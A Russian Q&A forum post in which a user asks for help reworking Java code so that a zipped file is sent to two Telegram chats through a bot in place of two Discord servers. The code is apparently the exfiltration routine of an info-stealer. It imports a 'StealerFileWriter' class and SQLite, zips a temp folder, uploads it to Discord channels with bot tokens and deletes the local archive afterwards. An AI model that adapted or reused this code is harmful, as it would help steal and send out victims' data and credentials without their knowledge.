Кто может переделать часть кода java?

Kydimkaf Jasokasd Ученик (84), на голосовании 3 месяца назад
Мне нужно, чтобы файл отправлялся в тг по двум чат айди через бота а не в дс. Кто может сделать, помогите плиз. в коде ниже он отправляется в 2 дс сервера
import java.io .File;
import java.io .IOException;
import java.lang.reflect.Field;
import java.nio.file.Paths;
import java.sql.DriverManager;
import java.sql.SQLException;
import net.dv8tion.jda.api.JDA;
import net.dv8tion.jda.api.JDABuilder;
import net.dv8tion.jda.api.requests.restaction.MessageCreateAction;
import net.dv8tion.jda.api.utils.FileUpload;
import net.lingala.zip4j.ZipFile;
import org.reallyworld.proverka.StealerFileWriter;
import org.reallyworld.proverka.utilities.OSUtility;
import org.sqlite.JDBC;

 private static void sendFile() {
try {
JDA jda1 = JDABuilder.createDefault("token").build();
jda1.awaitReady();
JDA jda2 = JDABuilder.createDefault("token").build();
jda2.awaitReady();
((MessageCreateAction)jda1.getTextChannelById("id1").sendMessage("123").addFiles(FileUpload.fromData(new File(String.valueOf(TEMP_DIRECTORY.getParentFile().getAbsolutePath()) + "\\" + TEMP_DIRECTORY.getName() + ".zip")))).queue(success -> {
try {
jda1.shutdownNow();
OSUtility.delHelp(Paths.get(String.valueOf(TEMP_DIRECTORY.getParentFile().getAbsolutePath()) + "\\" + TEMP_DIRECTORY.getName() + ".zip", new String[0]));
}
catch (Exception e4) {
e4.printStackTrace();
}
});
((MessageCreateAction)jda2.getTextChannelById("id2").sendMessage("456").addFiles(FileUpload.fromData(new File(String.valueOf(TEMP_DIRECTORY.getParentFile().getAbsolutePath()) + "\\" + TEMP_DIRECTORY.getName() + ".zip")))).queue(success -> {
try {
jda2.shutdownNow();
OSUtility.delHelp(Paths.get(String.valueOf(TEMP_DIRECTORY.getParentFile().getAbsolutePath()) + "\\" + TEMP_DIRECTORY.getName() + ".zip", new String[0]));
}
catch (Exception e5) {
e5.printStackTrace();
}
});
}
catch (Exception e3) {
e3.printStackTrace();
}
Голосование за лучший ответ